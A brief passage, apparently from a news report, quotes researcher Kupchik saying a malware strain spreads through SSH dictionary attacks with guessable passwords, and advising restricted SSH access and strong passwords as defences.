"The malware's method of lateral movement is via plain old SSH credentials dictionary attacks," Kupchik said. "Restricting arbitrary internet SSH access to your network greatly diminishes the risks of infection. In addition, using strong (not default or randomly generated) passwords also makes your network more secure, as the malware uses a basic list of guessable passwords."